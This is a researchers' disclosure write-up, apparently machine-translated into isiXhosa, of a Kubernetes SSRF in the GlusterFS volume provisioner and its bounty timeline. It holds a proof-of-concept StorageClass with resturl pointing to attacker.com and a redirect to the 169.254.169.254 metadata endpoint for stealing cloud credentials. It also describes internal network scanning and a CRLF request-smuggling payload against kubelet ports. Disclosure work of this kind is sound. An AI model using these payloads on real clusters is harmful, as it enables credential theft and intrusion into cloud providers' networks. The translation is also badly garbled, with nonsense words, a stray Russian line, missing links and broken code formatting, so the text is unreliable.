Phawula. transl.: ababhali beli nqaku bathetha banzi malunga nendlela abakwazi ngayo ukufumanisa ukuba sesichengeni e Kubernetes. Nangona ekuqaleni bekungabonakali kuyingozi kakhulu, ngokudityaniswa nezinye izinto ukugxeka kwayo kuye kwabonakala kuphezulu kwabanye ababoneleli bamafu. Imibutho emininzi iye yavuza iingcali ngomsebenzi wazo.
Singoobani
Singabaphandi ababini bokhuseleko baseFransi abaye bafumanisa ngokudibeneyo ubuthathaka eKubernetes. Amagama ethu nguBrice Augras kunye noChristophe Hauquiert, kodwa kumaqonga amaninzi eBug Bounty saziwa ngokuba yiReeverzax kunye neHach ngokulandelelanayo:
- - ;
- -Kubernetes umakhi kwaNokia.
Kwenzekentoni?
Eli nqaku yindlela yethu yokwabelana ngendlela iprojekthi yophando eqhelekileyo ngokungalindelekanga yajika yaba yeyona nto inomdla ebomini babazingeli beebug (ubuncinci okwangoku).
Njengoko usazi, abazingeli be-bug baneempawu ezimbalwa eziphawulekayo:
- baphila ngepizza kunye nebhiya;
- bayasebenza xa wonke umntu elele.
Akunjalo kule migaqo: sihlala sidibana ngeempelaveki kwaye sichitha ubusuku bokungalali sigqekeza. Kodwa obunye ubusuku baphela ngendlela engaqhelekanga.
Ekuqaleni besiza kudibana ukuze sixoxe ngokuthatha inxaxheba Umhala olandelayo. Ngexesha lencoko malunga nokhuseleko lweKubernetes kwindawo yenkonzo elawulwayo, sikhumbule umbono wakudala weSSRF () kwaye ndagqiba ekubeni ndizame ukuyisebenzisa njengeskripthi sohlaselo.
Ngentsimbi ye-11 pm sahlala phantsi ukwenza uphando lwethu kwaye salala kwakusasa, saneliseke kakhulu ngeziphumo. Kungenxa yolu phando ukuba sadibana nenkqubo ye-MSRC Bug Bounty kwaye seza nelungelo lokunyuka kwelungelo lokuxhaphaza.
Kwadlula iiveki / iinyanga ezininzi, kwaye iziphumo zethu ezingalindelekanga zibangele owona mvuzo uphakamileyo kwimbali ye-Azure Cloud Bug Bounty - ukongeza kulowo siwufumene kuKubernetes!
Ngokusekelwe kwiprojekthi yethu yophando, iKomiti yoKhuseleko lweMveliso yeKubernetes ipapashwe .
Ngoku ndingathanda ukusasaza ulwazi malunga nobuthathaka obufunyenweyo kangangoko ndinakho. Siyathemba ukuba uyakuxabisa ukufumana kwaye wabelane ngeenkcukacha zobuchwepheshe kunye namanye amalungu oluntu lwe-infosec!
Nali ke ibali lethu...
Umxholo
Ukwenza eyona ngqiqo yoko kwenzekileyo, masiqale sijonge indlela uKubernetes asebenza ngayo kwindawo elawulwa ngamafu.
Xa umisela iqela le-Kubernetes kwindawo enjalo, umaleko wolawulo ngokuqhelekileyo luxanduva lomboneleli welifu:
Umaleko wolawulo ubekwe kwiperimeter yomboneleli welifu, ngelixa ii-Kubernetes node zibekwe kumda womthengi.
Ukwaba iivolumu ngokuguquguqukayo, umatshini usetyenziselwa ukubonelela ngokuguquguqukayo ukusuka kwi-backend yokugcina yangaphandle kwaye uthelekise kunye ne-PVC (ibango levolumu eqhubekayo, okt isicelo sevolumu).
Ngaloo ndlela, emva kokuba i-PVC idalwe kwaye ibophelelwe kwi-StorageClass kwiqela le-K8s, izenzo ezongezelelweyo zokubonelela umthamo zithathwa ngumphathi we-kube / cloud controller (igama layo elichanekileyo lixhomekeke ekukhululweni). (Phawula. transl.: Sele sibhale ngakumbi malunga ne-CCM usebenzisa umzekelo wokuphunyezwa kwayo komnye wababoneleli befu .)
Kukho iintlobo ezininzi zababoneleli abaxhaswa nguKubernetes: uninzi lwabo lufakiwe , ngelixa ezinye zilawulwa ngababoneleli abongezelelweyo abafakwe kwiipods kwiqela.
Kuphando lwethu, sigxininise kwindlela yokubonelela ngomthamo wangaphakathi, oboniswe ngezantsi:
Unikezelo olunamandla lwemithamo kusetyenziswa umboneleli owakhelwe ngaphakathi we-Kubernetes
Ngamafutshane, xa i-Kubernetes isetyenziswe kwindawo elawulwayo, umphathi womlawuli uxanduva lomboneleli wefu, kodwa isicelo sokudala umthamo (inombolo ye-3 kumzobo ongentla) ushiya inethiwekhi yangaphakathi yomboneleli wefu. Kwaye kulapho izinto ziba nomdla kakhulu!
Imeko yokuHacking
Kweli candelo, siya kuchaza indlela esisebenzisa ngayo ithuba lomsebenzi okhankanywe ngasentla kwaye sifikelele kwimithombo yangaphakathi yomboneleli wenkonzo yefu. Iya kukubonisa ukuba ungenza njani na izenzo ezithile, ezinjengokufumana iziqinisekiso zangaphakathi okanye amalungelo akhulayo.
Uqhathazo olunye olulula (kule meko, i-Service Side Request Forgery) yanceda ukuhamba ngaphaya kwemekobume yabaxumi ukuya kumaqela ababoneleli ngeenkonzo abohlukeneyo phantsi kwee-K8 ezilawulwayo.
Kuphando lwethu sigxile kumboneleli weGlusterFS. Ngaphandle kwento yokuba ulandelelwano olongezelelweyo lwezenzo luchazwe kulo mongo, i-Quobyte, i-StorageOS kunye ne-ScaleIO ziyakwazi ukuxhatshazwa okufanayo.
Ukusetyenziswa kakubi kwendlela yokubonelela ngomthamo oguqukayo
Ngexesha lohlalutyo lweklasi yokugcina GlusterFS kwikhowudi yemvelaphi yomxhasi weGolang thina ukuba kwisicelo sokuqala se-HTTP (3) esithunyelwe ngexesha lokudala umthamo, ukuya ekupheleni kwe-URL yesiko kwiparameter resturl yongezwa /volumes.
Sigqibe kwelokuba siyikhuphe le ndlela yongezelelekileyo ngokongeza # kwipharamitha resturl. Nalu uqwalaselo lokuqala lwe-YAML esasiluvavanyele ubuthathaka be-SSRF obufutshane. (unokufunda ngakumbi malunga ne-semi-blind okanye i-SSRF eyimfama, umzekelo, - malunga. guqulela.):
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
name: poc-ssrf
provisioner: kubernetes.io/glusterfs
parameters:
resturl: "http://attacker.com:6666/#"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
name: poc-ssrf
spec:
accessModes:
- ReadWriteOnce
volumeMode: Filesystem
resources:
requests:
storage: 8Gi
storageClassName: poc-ssrfEmva koko sasebenzisa ibhinari ukulawula ukude iqela leKubernetes kubectl. Ngokuqhelekileyo, ababoneleli belifu (Azure, Google, AWS, njl.) bakuvumela ukuba ufumane iziqinisekiso zokusetyenziswa kolu ncedo.
Ndiyabulela kule nto, ndiye ndakwazi ukusebenzisa ifayile yam "eyodwa". Kube-controller-manager wenze isicelo seHTTP esinesiphumo:
kubectl create -f sc-poc.yaml
Impendulo ngokwembono yomhlaseli
Kungekudala emva koku, siye sakwazi ukufumana impendulo ye-HTTP kwi-server ekujoliswe kuyo - ngemiyalelo describe pvc okanye get events kwi kubectl. Kwaye ngokwenene: lo mqhubi we-Kubernetes ongagqibekanga uthetha kakhulu kwizilumkiso / imiyalezo yempazamo ...
Nanku umzekelo onekhonkco ku https://www.google.frseta njenge parameter resturl:
kubectl describe pvc poc-ssrf
# или же можете воспользоваться kubectl get events
Kule ndlela, besilinganiselwe kwimibuzo efana nale HTTP POST kwaye ayikwazanga ukufumana imixholo yebhodi yempendulo ukuba ikhowudi yokubuyisela yayiyiyo 201. Ke ngoko, sigqibe kwelokuba senze uphando olongezelelweyo kwaye sandise le meko yokuqhekezwa ngeendlela ezintsha.
Ukuvela kophando lwethu
- I-Advanced Scenario #1: Ukusebenzisa i-302 yokuqondisa kwakhona kwi-server yangaphandle ukutshintsha indlela ye-HTTP ukubonelela ngendlela eguquguqukayo yokuqokelela idatha yangaphakathi.
- Imeko ekwinqanaba eliphezulu #2: Zizenzele ukuskena kwe-LAN kunye nokufunyanwa kwesixhobo sangaphakathi.
- Imeko ekwinqanaba eliphambili #3: usebenzisa iHTTP CRLF + ukuthutyeleziswa (“isicelo sokuthutyeleziswa”) ukwenza izicelo zeHTTP ezilungiselelweyo kunye nokubuyisela idatha ekhutshwe kwiilogi ze-kube-controller.
IiNgcaciso zobuGcisa
- Uphando lusebenzise i-Azure Kubernetes Service (AKS) kunye ne-Kubernetes version 1.12 kummandla waseMntla Yurophu.
- Iimeko ezichazwe ngasentla zenziwa kukhupho lwamva nje lweKubernetes, ngaphandle kwemeko yesithathu, kuba wayefuna iKubernetes eyakhelwe ngenguqulo yeGolang ≤ 1.12.
- Umncedisi wangaphandle womhlaseli -
https://attacker.com.
I-Advanced Scenario #1: Ukuqondisa kwakhona isicelo se-HTTP POST kwi-GET kunye nokufumana idatha ebucayi
Indlela yokuqala yaphuculwa ngokucwangciswa komncedisi womhlaseli ukuba abuyele 302 HTTP Retcodeukuguqula isicelo se-POST kwisicelo se-GET (inyathelo lesi-4 kumzobo):
Isicelo sokuqala (3) esivela kumxhasi GlusterFS (Umphathi woMlawuli), unodidi lwe-POST. Ngokulandela la manyathelo siye sakwazi ukuyijika ibe yiGET:
- Njenge parameter
resturlkwiStoreClass ibonisiwehttp://attacker.com/redirect.php. - Endpoint
https://attacker.com/redirect.phpiphendula ngekhowudi yobume be-302 ye-HTTP enesihloko seNdawo esilandelayo:http://169.254.169.254. Oku kunokuba nayiphi na enye imithombo yangaphakathi - kulo mzekelo, ikhonkco lokuqondisa kwakhona lisetyenziswa kuphela njengomzekelo. - Ukungagqibeki umnatha/http ithala leencwadi I-Golang iphinda iqondise isicelo kwaye iguqule i-POST kwi-GET enekhowudi yesimo se-302, okubangele isicelo se-HTTP GET kwisixhobo esijoliswe kuyo.
Ukufunda umzimba wempendulo ye-HTTP kufuneka uyenze describe Into yePVC:
kubectl describe pvc xxxNanku umzekelo wempendulo ye-HTTP kwifomati ye-JSON esikwazileyo ukuyifumana:
Ubunakho bokufunyanwa sesichengeni ngelo xesha babulinganiselwe ngenxa yezi ngongoma zilandelayo:
- Ukungakwazi ukufaka iiheader zeHTTP kwisicelo esiphumayo.
- Ukungakwazi ukwenza isicelo se-POST ngeeparamitha emzimbeni (oku kulungele ukucela ixabiso eliphambili ukusuka kumzekelo we etcd oqhuba kwi 2379 izibuko ukuba i-HTTP engafihlwanga iyasetyenziswa).
- Ukungakwazi ukubuyisela umxholo womzimba wokuphendula xa ikhowudi yesimo yayiyi-200 kwaye impendulo yayingenayo i-JSON Content-Type.
Imeko ekwinqanaba eliphambili #2: Iskena inethiwekhi yendawo
Le ndlela ye-SSRF engaboniyo isetyenziselwe ukuskena uthungelwano lwangaphakathi lomnikezeli welifu kunye nokuvota ngeenkonzo ezahlukeneyo zokumamela (umzekelo weMetadata, Kubelet, njl njl.) ngokusekelwe kwiimpendulo. kube isilawuli.
Okokuqala, izibuko ezisemgangathweni zokumamela zamacandelo e-Kubernetes zamiselwa (8443, 10250, 10251, njl.), kwaye ke kwafuneka sizenzele inkqubo yokuskena.
Ukubona ukuba le ndlela yokukhangela izixhobo ichanekile kwaye ayihambelani neskena sakudala kunye nezixhobo ze-SSRF, sigqibe kwelokuba senze abethu abasebenzi kwiskripthi se-bash esenzela yonke inkqubo.
Ngokomzekelo, ukwenzela ukuskena ngokukhawuleza uluhlu lwe-172.16.0.0/12 yothungelwano lwangaphakathi, abasebenzi be-15 baqaliswe ngokufanayo. Olu luhlu lungentla lwe-IP lukhethwe njengomzekelo kuphela kwaye lunokutshintshwa kuluhlu lwe-IP lomnikezeli wakho wenkonzo othile.
Ukuskena idilesi ye-IP enye kunye nezibuko elinye, kufuneka wenze oku kulandelayo:
- cima iStoreClass yokugqibela ekhangelweyo;
- susa iBango leVolumu eliqinisekisiweyo langaphambili eliqinisekisiweyo;
- tshintsha amaxabiso e-IP kunye nePort kwi
sc.yaml; - yenza i-StoreClass nge-IP entsha kunye ne-port;
- yenza iPVC entsha;
- khupha iziphumo zokuskena usebenzisa ukuchaza kwiPVC.
Imeko ephucukileyo #3: inaliti yeCRLF + ukuthutyeleziswa kweHTTP kwiinguqulelo “ezindala” zeqela leKubernetes
Ukuba ukongeza koku umboneleli unike abathengi iinguqulelo ezindala zeqela le-K8s и ibanike ufikelelo kwi kube-controller-logs yomphathi, isiphumo siye sabaluleka ngakumbi.
Kulunge ngakumbi ukuba umhlaseli atshintshe izicelo zeHTTP ezenzelwe ukufumana impendulo epheleleyo yeHTTP ngokokubona kwakhe.
Ukuphumeza imeko yokugqibela, le miqathango ilandelayo kwafuneka kuhlangatyezwane nayo:
- Umsebenzisi kufuneka abe nofikelelo kube-controller-manager logs (njengoko, umzekelo, kwi-Azure LogInsights).
- Iqela leKubernetes kufuneka lisebenzise inguqulelo yeGolang ngaphantsi kwe-1.12.
Sisasaze imeko yendawo elinganisa unxibelelwano phakathi komxumi we-GlusterFS Go kunye neseva ekujoliswe kuyo yobuxoki (siyakuyeka ukupapasha i-PoC okwangoku).
Ifunyenwe , ezichaphazela iinguqulelo zeGolang ezingaphantsi kwe-1.12 kunye nokuvumela abahlaseli ukuba benze ukuhlaselwa kwe-HTTP / CRLF.
Ngokudibanisa i-SSRF eyimfama echazwe ngasentla kunye ngoku, sikwazile ukuthumela izicelo esizithandayo, ukuquka ukubuyisela iiheader, indlela yeHTTP, iiparamitha kunye nedatha, apho kube-controller-manager emva koko iqhubekeke.
Nanku umzekelo we "bait" esebenzayo kwiparameter resturl StorageClass, esebenzisa imeko yohlaselo efanayo:
http://172.31.X.1:10255/healthz? HTTP/1.1rnConnection: keep-
alivernHost: 172.31.X.1:10255rnContent-Length: 1rnrn1rnGET /pods? HTTP/1.1rnHost: 172.31.X.1:10255rnrnIsiphumo yimpazamo impendulo engacelwanga, umyalezo malunga norekhodwa kwiilogi zomlawuli. Enkosi kwi-verbosity eyenziwe ngokungagqibekanga, imixholo yomyalezo wempendulo yeHTTP nayo igcinwe apho.
Le yayiyeyona “yeyeyeyeyeye” isebenzayo kwisakhelo sobungqina bengcamango.
Ngokusebenzisa le ndlela, sikwazile ukwenza olu hlaselo lulandelayo kumaqela ahlukeneyo ababoneleli be-k8s abalawulwayo: ukunyuswa kwamalungelo kunye neziqinisekiso kwiimeko zemethadatha, i-Master DoS nge (engafihlwanga) izicelo ze-HTTP kwiimeko eziphambili ze- etcd, njl.
Iziphumo
Kwingxelo esemthethweni ye-Kubernetes malunga nokuba semngciphekweni kwe-SSRF esiyifumeneyo, inikwe umlinganiselo I-CVSS 6.3/10: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N. Ukuba siqwalasela kuphela ubuthathaka obunxulumene nomjikelezo weKubernetes, iVector yengqibelelo (iVector yemfezeko) ifaneleka njenge nanye.
Nangona kunjalo, ukuvavanya iziphumo ezinokwenzeka kumxholo wendawo yenkonzo elawulwayo (kwaye le yayiyeyona nxalenye inomdla wophando lwethu!) Kwasishukumisela ukuba siphinde sihlele ubuthathaka njengokulinganisa I-CVSS10/10 ebalulekileyo kubasasazi abaninzi.
Apha ngezantsi lulwazi olongezelelweyo ukukunceda uqonde iingqwalasela zethu xa uvavanya iimpembelelo ezinokuthi zibe kho kwimekobume yelifu:
Ingqibelelo
- Yenza imiyalelo ukude usebenzisa iziqinisekiso zangaphakathi ezifunyenweyo.
- Ukuvelisa kwakhona le meko ingasentla usebenzisa indlela ye-IDOR (i-Insecure Direct Object Reference) kunye nezinye izibonelelo ezifumaneka kuthungelwano lwendawo.
Imfihlo
- Uhlobo lohlaselo enkosi kubusela iziqinisekiso ilifu (umzekelo, metadata API).
- Ukuqokelela ulwazi ngokuskena inethiwekhi yendawo (ukugqiba inguqulelo ye-SSH, uguqulelo lomncedisi we-HTTP, ...).
- Qokelela umzekelo kunye nolwazi lwezakhiwo ngokuvota kwangaphakathi APIs ezifana ne-metadata API (
http://169.254.169.254,…). - Ukubiwa kwedatha yabathengi usebenzisa iziqinisekiso zamafu.
Ukufumaneka
Zonke iimeko zokuxhaphaza ezinxulumene nokuhlaselwa kweevektha ingqibelelo, ingasetyenziselwa izenzo ezonakalisayo kwaye ikhokhelele kwiimeko eziphambili ukusuka kumxhasi weperimeter (okanye nayiphi na enye) ayifumaneki.
Okoko besikwimo engqongileyo ye-K8s elawulwayo kwaye sivavanya impembelelo kwimfezeko, sinokucinga ngeemeko ezininzi ezinokuchaphazela ukufumaneka. Imizekelo eyongezelelweyo ibandakanya ukonakalisa i-database ye-etcd okanye ukwenza umnxeba obalulekileyo kwi-Kubernetes API.
Ixesha lexesha
- NgoDisemba 6, 2019: Ukuba sesichengeni kuxelwe kwi-MSRC Bug Bounty.
- NgoJanuwari 3, 2020: Umntu wesithathu wazise abaphuhlisi beKubernetes ukuba sisebenza ngomba wokhuseleko. Kwaye wabacela ukuba bathathele ingqalelo i-SSRF njengendawo yangaphakathi (in-core) sesichengeni. Emva koko sinike ingxelo jikelele eneenkcukacha zobugcisa malunga nomthombo wengxaki.
- NgoJanuwari 15, 2020: Sibonelele ngeengxelo zobugcisa nezesiqhelo kubaphuhlisi beKubernetes ngesicelo sabo (ngeqonga leHackerOne).
- NgoJanuwari 15, 2020: Abaphuhlisi beKubernetes basazise ukuba inaliti ye-SSRF + CRLF engaboniyo kukhupho lwangaphambili ithathwa njengobuthathaka obungaphakathi. Ngoko nangoko sayeka ukuhlalutya iiperimitha zabanye ababoneleli ngenkonzo: iqela le-K8s ngoku lalijongene nonobangela.
- NgoJanuwari 15, 2020: Ibhaso le-MSRC lifunyenwe ngeHackerOne.
- NgoJanuwari 16, 2020: Kubernetes PSC (IKomiti yoKhuseleko lweMveliso) yabona ukuba sesichengeni kwaye yacela ukuyigcina iyimfihlo kude kube phakathi kuMatshi ngenxa yenani elikhulu lamaxhoba anokubakho.
- NgoFebruwari 11, 2020: Ibhaso leVRP likaGoogle lifunyenwe.
- Nge-4 kaMatshi 2020: Umvuzo we-Kubernetes ufunyenwe ngeHackerOne.
- Nge-15 kaMatshi 2020: Ukubhengezwa okucwangcisiweyo kwangaphambili kwahlehliswa ngenxa yemeko ye-COVID-19.
- NgoJuni 1, 2020: Kubernetes + Inkcazo edibeneyo yeMicrosoft malunga nokuba sesichengeni.
TL; DR
- Sisela utywala kwaye sitye ipizza :)
- Sifumene ubuthathaka obungaphakathi eKubernetes, nangona besingenanjongo yakwenza njalo.
- Senze uhlalutyo olongezelelweyo kumaqela ababoneleli bamafu ahlukeneyo kwaye sakwazi ukunyusa umonakalo obangelwa bubuthathaka bokufumana iibhonasi ezongezelelweyo ezoyikekayo.
- Uya kufumana iinkcukacha ezininzi zobugcisa kweli nqaku. Singavuya ukuxoxa ngazo nawe (Twitter: & ).
- Kwavela ukuba zonke iintlobo zeendlela ezisesikweni kunye nokunika ingxelo kuthathe ixesha elide kunokuba bekulindelwe.
iimbekiselo
- ;
- ;
- ;
- .
PS evela kumguquleli
Funda nakwibhlog yethu:
- «";
- «";
- «».
umthombo: www.habr.com